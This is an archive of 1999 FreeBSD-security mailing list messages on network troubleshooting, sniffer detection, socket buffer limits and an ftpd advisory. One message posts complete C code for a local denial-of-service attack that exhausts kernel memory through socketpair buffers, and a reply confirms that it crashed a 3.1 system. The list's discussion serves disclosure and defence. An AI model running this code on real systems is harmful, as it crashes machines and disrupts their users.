is on Pac Bell DSL but has a co-location with us. Everytime he starts a large FTP transfer it goes at full speed but slowly degrades. His colocation is running FreeBSD 3.2 and his office computer is Windows 98 with CuteFTP. Has anyone else seen this? At 08:20 PM 9/9/99 -0400, you wrote: >Nick Hibma wrote: > > > > Best guess: A firewall is expiring your connection. If you have the > > problem that ftp connection go slower and slo-wer and slo-w-e-r after > > the first MegaByte, you probably use the same product as our friends > > around here. > > > > Nick > >The connection does not seem to exhibit any "slow down". >It just randomly disconnects. > >Thanks, >-- >Jim Durham > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 19:30:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from secure.smtp.email.msn.com (cpimssmtpu07.email.msn.com [207.46.181.28]) by hub.freebsd.org (Postfix) with ESMTP id 9DA9F15100 for ; Thu, 9 Sep 1999 19:30:20 -0700 (PDT) (envelope-from JHowie@msn.com) Received: from JHowie - 216.103.48.12 by email.msn.com with Microsoft SMTPSVC; Thu, 9 Sep 1999 19:29:11 -0700 Message-ID: <011f01befb35$669b12f0$fd01a8c0@pacbell.net> From: "John Howie" To: , , "Deepwell Internet" References: <4.2.0.58.19990909172429.01ff7340@mail1.dcomm.net> Subject: Re: ssh disconnects Date: Thu, 9 Sep 1999 19:37:18 -0700 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There are problems with Windows 95/98/NT protocol stacks that can cause this. Check out TechNet at http://www.microsoft.com/technet I can't remember the KB Article, sorry... john... ----- Original Message ----- From: Deepwell Internet To: ; Sent: Thursday, September 09, 1999 5:27 PM Subject: Re: ssh disconnects > We have a situation where a customer gets these FTP slowdowns. He is on > Pac Bell DSL but has a co-location with us. Everytime he starts a large > FTP transfer it goes at full speed but slowly degrades. His colocation is > running FreeBSD 3.2 and his office computer is Windows 98 with CuteFTP. > > Has anyone else seen this? > > > > > At 08:20 PM 9/9/99 -0400, you wrote: > >Nick Hibma wrote: > > > > > > Best guess: A firewall is expiring your connection. If you have the > > > problem that ftp connection go slower and slo-wer and slo-w-e-r after > > > the first MegaByte, you probably use the same product as our friends > > > around here. > > > > > > Nick > > > >The connection does not seem to exhibit any "slow down". > >It just randomly disconnects. > > > >Thanks, > >-- > >Jim Durham > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 21:25:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 1418114EF6 for ; Thu, 9 Sep 1999 21:25:13 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1958 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 9 Sep 1999 22:59:24 -0500 (CDT) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Aug-7) Date: Thu, 9 Sep 1999 22:59:24 -0500 (CDT) From: James Wyatt To: Mark Newton Cc: Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC In-Reply-To: <199909092251.IAA74937@atdot.dotat.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 10 Sep 1999, Mark Newton wrote: > James Wyatt wrote: > > After reading the AntiSniff stuff by the L0pht folks, I'm not so sure. I > > could send an attack packet to your machine with a forged (or real) return > > address. When you look-up the hostname in DNS during capture or reporting, > > I could see (sniff DNS server ENet, hack DNS server, etc) the DNS query > > and know you saw my packet. > > How are you going to do that when I can't transmit any packets? Maybe *it* can't, but where I've seen these used, there is one or more card(s) setup in sniff-only mode (snip!), but another card (usually behind the firewall) to access the machine. If you are looking at the packets on that or another machine, your package might be nice enough to look-up the addresses on the packets. If I see the DNS query for it, I know you have been looking at my attack packets, don't I? Maybe the sniffing adapter can't transmit, but if there is *any* lookup on the information received from it, you become *very* visible. Honest, go read the anti-sniff stuff by L0pht, it is just damn good thinking about how things really work. Before I read the work, I would have said some of it was impossible. Now that I have, I can write some of it. The insight provided was insiprational. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 21:55:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from pop3-3.enteract.com (pop3-3.enteract.com [207.229.143.32]) by hub.freebsd.org (Postfix) with SMTP id 030371524B for ; Thu, 9 Sep 1999 21:55:26 -0700 (PDT) (envelope-from dscheidt@enteract.com) Received: (qmail 76779 invoked from network); 10 Sep 1999 04:54:05 -0000 Received: from shell-1.enteract.com (dscheidt@207.229.143.40) by pop3-3.enteract.com with SMTP; 10 Sep 1999 04:54:05 -0000 Date: Thu, 9 Sep 1999 23:54:05 -0500 (CDT) From: David Scheidt To: James Wyatt Cc: Mark Newton , Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 9 Sep 1999, James Wyatt wrote: > On Fri, 10 Sep 1999, Mark Newton wrote: > > James Wyatt wrote: > > > After reading the AntiSniff stuff by the L0pht folks, I'm not so sure. I > > > could send an attack packet to your machine with a forged (or real) return > > > address. When you look-up the hostname in DNS during capture or reporting, > > > I could see (sniff DNS server ENet, hack DNS server, etc) the DNS query > > > and know you saw my packet. > > > > How are you going to do that when I can't transmit any packets? > > Maybe *it* can't, but where I've seen these used, there is one or more > card(s) setup in sniff-only mode (snip!), but another card (usually behind > the firewall) to access the machine. If you are looking at the packets on > that or another machine, your package might be nice enough to look-up the > addresses on the packets. If I see the DNS query for it, I know you have > been looking at my attack packets, don't I? Which is why the machine doing the sniffing has to do its look ups on a network that is invisible to any of the machines it's sniffing. That, or you don't do the lookups on-line. > > Maybe the sniffing adapter can't transmit, but if there is *any* lookup on > the information received from it, you become *very* visible. Only if the sniffer-sniffer can see your lookups. Some care is in order in setting things up, clearly. That is true of all security though, so this shouldn't be a shock. > > Honest, go read the anti-sniff stuff by L0pht, it is just damn good > thinking about how things really work. Before I read the work, I would > have said some of it was impossible. Now that I have, I can write some of > it. The insight provided was insiprational. - Jy@ > Indeed. It is really quite impressive thinking. David Scheidt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 22:22:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id E40A615328 for ; Thu, 9 Sep 1999 22:22:45 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 28613 invoked by uid 1001); 10 Sep 1999 05:20:49 +0000 (GMT) To: freebsd@gndrsh.dnsmgr.net Cc: imp@village.org, jwyatt@rwsystems.net, Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC From: sthaug@nethelp.no In-Reply-To: Your message of "Thu, 9 Sep 1999 12:53:26 -0700 (PDT)" References: <199909091953.MAA18901@gndrsh.dnsmgr.net> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Fri, 10 Sep 1999 07:20:48 +0200 Message-ID: <28610.936940848@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Can you confirm for me that the link pulses are actually a function of > the MAU/MII and not the NIC chip. I don't recall seeing anything in any > NIC chip data sheet that talks about these. I don't have any current > MAU/MII data sheets. The link pulses (generation and detection) are a function of the PHY. See for instance the data sheet for the Intel 82555 PHY from Intel's Developer site. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 23:42:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from sonet.crimea.ua (OTC-sl3-FLY.CRIS.NET [212.110.136.71]) by hub.freebsd.org (Postfix) with ESMTP id 9EB43151DF; Thu, 9 Sep 1999 23:41:47 -0700 (PDT) (envelope-from stas@sonet.crimea.ua) Received: (from stas@localhost) by sonet.crimea.ua (8.8.8/8.8.8) id JAA13107; Fri, 10 Sep 1999 09:41:54 +0400 (MSD) (envelope-from stas) Date: Fri, 10 Sep 1999 09:41:54 +0400 (MSD) From: Stas Kisel Message-Id: <199909100541.JAA13107@sonet.crimea.ua> To: jared@puck.nether.net, stas@sonet.crimea.ua Subject: Re: mbuf shortage situations Cc: avalon@coombs.anu.edu.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <19990909110720.A6694@puck.nether.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > From jared@puck.nether.net Thu Sep 9 18:10:06 1999 > I am creating about 100 icmp sockets, and as they are > created, allocate a very large SO_RCVBUF: > (void)setsockopt(localstruct->icmp_s, SOL_SOCKET, > SO_RCVBUF, (char *)&hold, sizeof(hold)); This can be a part of the problem too. setsockopt() have to check if there is really free memory for buffer and set an appropriate, described in man page errno if failed. In my test, 2.2.7 kernel allowed me to "allocate" in this way 15M "for buffers" on a 32M machine (NMBCLUSTERS=1024, maxusers=50). Probably it could allow more, but I thought 15M is too much anyways. There is a limitation - buffer can not be bigger than ~240k. I did not checked which errno setsockopt() returns, but I didn't found anything appropriate in a man page. -- Stas Kisel. UNIX, security, C, TCP/IP, Web. UNIX - the best adventure game http://www.tekmetrics.com/transcript.shtml?pid=20053 http://www.crimea.edu +380(652)510222,230238 ; stas@crimea.edu stas@sonet.crimea.ua ; 2:460/54.4 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 4:16:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (Postfix) with ESMTP id F366C1574E for ; Fri, 10 Sep 1999 04:16:39 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id NAA19253 for freebsd-security@freebsd.org; Fri, 10 Sep 1999 13:16:10 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id NAA00834 for freebsd-security@freebsd.org; Fri, 10 Sep 1999 13:14:53 +0200 (CEST) (envelope-from zgabor) From: Zahemszky Gabor Message-Id: <199909101114.NAA00834@CoDe.hu> Subject: Re: ssh disconnects In-Reply-To: <011f01befb35$669b12f0$fd01a8c0@pacbell.net> from John Howie at "Sep 9, 99 07:37:18 pm" To: freebsd-security@freebsd.org Date: Fri, 10 Sep 1999 13:13:38 +0200 (CEST) X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > There are problems with Windows 95/98/NT protocol stacks that can cause > this. Check out TechNet at http://www.microsoft.com/technet I can't remember > the KB Article, sorry... > > > We have a situation where a customer gets these FTP slowdowns. He is on > > Pac Bell DSL but has a co-location with us. Everytime he starts a large > > FTP transfer it goes at full speed but slowly degrades. His colocation is > > running FreeBSD 3.2 and his office computer is Windows 98 with CuteFTP. > > > > Has anyone else seen this? Well, we had it between 2.2.7 and an OS/2 Warp (3? 4? patches? - cannot remember). We had to change the ethercard to another _type_ (and driver :-) on the os/2 machine. The interesting thing was, ftp was perfect in one way, and incremental slowdown on the other. (we cannot wait an ftp of a 100K file) And yesterday, I've found a similar problem between 3.[12] and W*. local net with 192.168.x.x --- FBSD ed0 192.168.x.y ----------- | | ed1 real IP to BigBadNet | ---------------------- Everything was OK (not perfect, but it's running), the local machines can surf, etc, but ftp from localmachine -> fbsd: one way good, the other way sloow (_not_ slowdown, only slooooower - but we _can_ transfer >M files opposed to the previous problem). The problem was, that natd is running, but! configured to the _wrong_ (ed0) interface. After configuring it to the correct interface, (a messing typo) it's fine. ZGabor at CoDe dot HU -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 5: 7:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay13.jaring.my (relay13.jaring.my [192.228.128.124]) by hub.freebsd.org (Postfix) with ESMTP id AAF2C15DC0 for ; Fri, 10 Sep 1999 05:07:30 -0700 (PDT) (envelope-from itpang@pd.jaring.my) Received: from Sismatik.utm.my ([161.139.68.31]) by relay13.jaring.my (8.8.8/8.8.7) with SMTP id UAA19002 for ; Fri, 10 Sep 1999 20:06:15 +0800 (MYT) Message-ID: <002f01bf11ea$8111a560$1f448ba1@Sismatik.utm.my> From: "Thomson Pang" To: Subject: how to modify packet Date: Sat, 9 Oct 1999 08:09:06 +0800 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_002C_01BF122D.8ED957E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_002C_01BF122D.8ED957E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dear =20 How to modify the packet below to the form 2 IPv4 |orig IP hdr | | | |(any options)| TCP | Data | = ---------------------------- (form 2) ------------------------------------------------- IPv4| orig IP hdr | ESP | | | ESP | ESP| |(any options)| Hdr | TCP | Data | Trailer |Auth| ------------------------------------------------- |<----- encrypted ---->| |<------ authenticated ----->| ------=_NextPart_000_002C_01BF122D.8ED957E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Dear
 
How to modify the packet below to = the form=20 2
    IPv4  |orig IP hdr   =20 |       =20 |        =20 |
            = |(any=20 options)| TCP | Data=20 |           =20 ----------------------------
  (form=20 2)
            = -------------------------------------------------
   &n= bsp; =20 IPv4|  orig IP hdr  | ESP = |       =20 |         |   ESP |=20 ESP|
           = ; |(any=20 options)| Hdr   | TCP | Data | Trailer=20 |Auth|
          &nb= sp;=20 -------------------------------------------------
   &n= bsp;           &nb= sp;           &nbs= p;   =20 |<----- encrypted=20 ---->|
          =             &= nbsp;  =20 |<------ authenticated = ----->|
------=_NextPart_000_002C_01BF122D.8ED957E0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 5:12:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay13.jaring.my (relay13.jaring.my [192.228.128.124]) by hub.freebsd.org (Postfix) with ESMTP id AED0515232 for ; Fri, 10 Sep 1999 05:12:43 -0700 (PDT) (envelope-from itpang@pd.jaring.my) Received: from Sismatik.utm.my ([161.139.68.31]) by relay13.jaring.my (8.8.8/8.8.7) with SMTP id UAA19459 for ; Fri, 10 Sep 1999 20:11:32 +0800 (MYT) Message-ID: <003e01bf11eb$3de70400$1f448ba1@Sismatik.utm.my> From: "Thomson Pang" To: Subject: how to modify the packet Date: Sat, 9 Oct 1999 08:14:23 +0800 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_003B_01BF122E.4BD04840" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_003B_01BF122E.4BD04840 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dear =20 How to modify the packet below to the form 2 IPv4 |orig IP hdr | | | |(any options)| TCP | Data | = ---------------------------- (form 2) ------------------------------------------------- IPv4| orig IP hdr | ESP | | | ESP | ESP| |(any options)| Hdr | TCP | Data | Trailer |Auth| ------------------------------------------------- |<----- encrypted ---->| |<------ authenticated ----->| ------=_NextPart_000_003B_01BF122E.4BD04840 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Dear
 
How to modify the packet below to = the form=20 2
    IPv4  |orig IP hdr   =20 |       =20 |        =20 |
            = |(any=20 options)| TCP | Data=20 |           =20 ----------------------------
  (form=20 2)
            = -------------------------------------------------
   &n= bsp; =20 IPv4|  orig IP hdr  | ESP = |       =20 |         |   ESP |=20 ESP|
           = ; |(any=20 options)| Hdr   | TCP | Data | Trailer=20 |Auth|
          &nb= sp;=20 -------------------------------------------------
   &n= bsp;           &nb= sp;           &nbs= p;   =20 |<----- encrypted=20 ---->|
          =             &= nbsp;  =20 |<------ authenticated = ----->|
------=_NextPart_000_003B_01BF122E.4BD04840-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 7:20:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from isiproxy.insolwwb.net (isiproxy.insolwwb.net [208.150.248.1]) by hub.freebsd.org (Postfix) with ESMTP id 723D215836 for ; Fri, 10 Sep 1999 07:20:03 -0700 (PDT) (envelope-from mgrommet@isiar.net) Received: by ISIMAIN with Internet Mail Service (5.5.2448.0) id ; Thu, 9 Sep 1999 08:21:35 -0500 Message-ID: <7011ACE3864AD31183E50008C7FA081F01D4C2@ISIMAIN> From: Michael Grommet To: "'freebsd-security@freebsd.org'" Subject: Concerning Latest FTPD exploit: FreeBSD Security Advisory: FreeBS D-SA-99:03.ftpd Date: Thu, 9 Sep 1999 08:20:46 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Am I correct in my assumtion that this is _not_ exploitable on the standard ftpd that installs with freebsd 2.2.8 - 3.2 - Stable? Please Advise. Mike Grommet Unix Systems Admin mgrommet@insolwwb.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 8:22:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 2489C1586C for ; Fri, 10 Sep 1999 08:22:34 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id LAA17473; Fri, 10 Sep 1999 11:11:57 -0400 (EDT) (envelope-from wollman) Date: Fri, 10 Sep 1999 11:11:57 -0400 (EDT) From: Garrett Wollman Message-Id: <199909101511.LAA17473@khavrinen.lcs.mit.edu> To: Stas Kisel Cc: freebsd-security@FreeBSD.ORG Subject: Re: mbuf shortage situations In-Reply-To: <199909100541.JAA13107@sonet.crimea.ua> References: <19990909110720.A6694@puck.nether.net> <199909100541.JAA13107@sonet.crimea.ua> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > There is a limitation - buffer can not be bigger than ~240k. Socket buffers cannot be larger than kernel tunable kern.ipc.maxsockbuf (default 256K). However, the actual memory potentially allocated to the socket buffer is much larger (kern.ipc.maxsockbuf * kern.ipc.sockbuf_waste_factor). -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 8:49:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp7.xs4all.nl (smtp7.xs4all.nl [194.109.127.50]) by hub.freebsd.org (Postfix) with ESMTP id 5BC6915D75 for ; Fri, 10 Sep 1999 08:49:01 -0700 (PDT) (envelope-from wdmgds@xs4all.nl) Received: from xs3.xs4all.nl (xs3.xs4all.nl [194.109.6.44]) by smtp7.xs4all.nl (8.9.3/8.9.3) with ESMTP id RAA20360 for ; Fri, 10 Sep 1999 17:48:52 +0200 (CEST) Received: from localhost (wdmgds@localhost) by xs3.xs4all.nl (8.9.0/8.9.0) with ESMTP id RAA02270 for ; Fri, 10 Sep 1999 17:21:27 +0200 (CEST) Date: Fri, 10 Sep 1999 17:21:27 +0200 (CEST) From: wdmgds To: freebsd-security@FreeBSD.ORG Subject: *bsd crashes/freezes/hangs on local user xploit Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear /etc compile this code snipplet and wheep ... it crashed and mutilated our 227 and 3x boxen.. BSDi4 just freezes a couple of seconds, bye -- #include #include #include #define BUFFERSIZE 204800 /* kiddy var le surgery */ extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 13:57: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id BB5DF14BDD for ; Fri, 10 Sep 1999 13:56:53 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id NAA02205; Fri, 10 Sep 1999 13:55:42 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id NAA15158; Fri, 10 Sep 1999 13:44:57 -0700 Received: from softweyr.com (dyn4.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA26427; Fri, 10 Sep 99 13:55:40 PDT Message-Id: <37D9704C.CE395DC4@softweyr.com> Date: Fri, 10 Sep 1999 14:55:40 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: wdmgds Cc: freebsd-security@FreeBSD.ORG Subject: Re: *bsd crashes/freezes/hangs on local user xploit References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org wdmgds wrote: > > Dear /etc > > compile this code snipplet and wheep ... > it crashed and mutilated our 227 and 3x boxen.. > BSDi4 just freezes a couple of seconds, It nailed 3.1-RELEASE on (I think) the 4th trip through the while loop, on the first write. I can't test on my -CURRENT or -STABLE machines, they're both being used at the moment. Nothing about the code looks nefarious. Are we just creaming buffer space in a nasty way? -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 17:50: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from tpone.telepac.pt (tpone.telepac.pt [194.65.3.20]) by hub.freebsd.org (Postfix) with ESMTP id D093A15F6E for ; Fri, 10 Sep 1999 17:49:52 -0700 (PDT) (envelope-from jotajustino@mail.telepac.pt) Received: from mail.telepac.pt ([194.65.220.220]) by tpone.telepac.pt (8.8.8+Sun/8.8.8) with SMTP id BAA19069 for FreeBSD-security@freebsd.org; Sat, 11 Sep 1999 01:51:11 +0100 (WET DST) From: jotajustino@mail.telepac.pt Message-Id: <199909110051.BAA19069@tpone.telepac.pt> X-Mailer: MailWorkZ Broadcast 3.0.10 Date: Sáb, 11 Set 1999 01:39:06 +0100 To: Subject: Please don't let Timor people die Reply-To: jotajustino@mail.telepac.pt MIME-Version: 1.0 Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In the referendum promoted by UN 80 % of East Timor people voted for Independence. Since then thousands on people have been killed JUST FOR THEIR VOTE . Almost all international journalists have been forced to leave East Timor ( only four rested ) . United Nations are LEAVING East Timor TOMORROW 1999-09-09 07h00 ( Pacific time ) , leaving the East Timor people ALONE, against those who are KILLING them. In 3 days more than 300.000 people have been forced to move. Indonisian policies and militaries have not been able to keep peace and have no conditions to maitain peace in East Timor. United Nations MUST send a Peace Keeping Force to East Timor. PLEASE, HELP EAST TIMOR, at this moment, they are being MURDERED. Forward this E-mail or write your own opinion to : secretary General of United Nations mailto:ecu@un.org president of United States of America mailto:president@whitehouse.gov president of China president of French Republic British Prime Miniter President of Russia the Pope or your religious leader your favorite newsgroup, your local senator, your favorite newspaper, your business partners or friends Read your favorite site for news about East Timor, or check the one of the world leaders http://www.cnn.com PS:Thanks, and our apologies for the off topic subject. Any coments can be sent to survey1_pt@hotmail.com at 15h00 GMT+01h00 Portugal will stop please do your share. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 10 17:55:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from arpa.com (rage.arpa.com [199.245.173.3]) by hub.freebsd.org (Postfix) with ESMTP id 000A714A0D for ; Fri, 10 Sep 1999 17:55:23 -0700 (PDT) (envelope-from jamie@arpa.com) Received: (from jamie@localhost) by arpa.com (8.9.3/8.9.3) id TAA12754; Fri, 10 Sep 1999 19:55:14 -0500 (CDT) Date: Fri, 10 Sep 1999 19:55:14 -0500 From: Jamie Rishaw To: jotajustino@mail.telepac.pt Cc: FreeBSD-security@FreeBSD.ORG Subject: Re: Please don't let Timor people die Message-ID: <19990910195513.A12739@rage.arpa.com> References: <199909110051.BAA19069@tpone.telepac.pt> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199909110051.BAA19069@tpone.telepac.pt>; from jotajustino@mail.telepac.pt on Sat, Sep 11, 1999 at 12:52:34AM +0000 X-Face: d=) RFC_Violation: You saw it here first! X-Note: This is my personal e-mail account X-PGP-Fingerprint: <921C135D> C4 48 1B 26 18 7B 1F D9 BA C4 9C 7A B1 07 07 E8 X-No-Archive: Yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org How do I configure my kernel for this? On Sat, Sep 11, 1999 at 12:52:34AM +0000, jotajustino@mail.telepac.pt wrote: > > In the referendum promoted by UN 80 % of East Timor people voted for > Independence. Since then thousands on people have been killed > JUST FOR THEIR VOTE . Almost all international journalists have been > forced to leave East Timor ( only four rested ) . > > United Nations are LEAVING East Timor TOMORROW 1999-09-09 07h00 > ( Pacific time ) , leaving the East Timor people ALONE, against those > who are KILLING them. > > In 3 days more than 300.000 people have been forced to move. > Indonisian policies and militaries have not been able to keep > peace and have no conditions to maitain peace in East Timor. > > United Nations MUST send a Peace Keeping Force to East Timor. > > PLEASE, HELP EAST TIMOR, at this moment, they are being MURDERED. > > Forward this E-mail or write your own opinion to : > secretary General of United Nations mailto:ecu@un.org > president of United States of America > mailto:president@whitehouse.gov > > president of China > president of French Republic > British Prime Miniter > President of Russia > > the Pope or your religious leader > your favorite newsgroup, > your local senator, > your favorite newspaper, > your business partners or friends > > Read your favorite site for news about East Timor, or check the > one of the world leaders http://www.cnn.com > PS:Thanks, and our apologies for the off topic subject. > Any coments can be sent to survey1_pt@hotmail.com > at 15h00 GMT+01h00 Portugal will stop please do your share. > > > To Unsubscribe: send mail 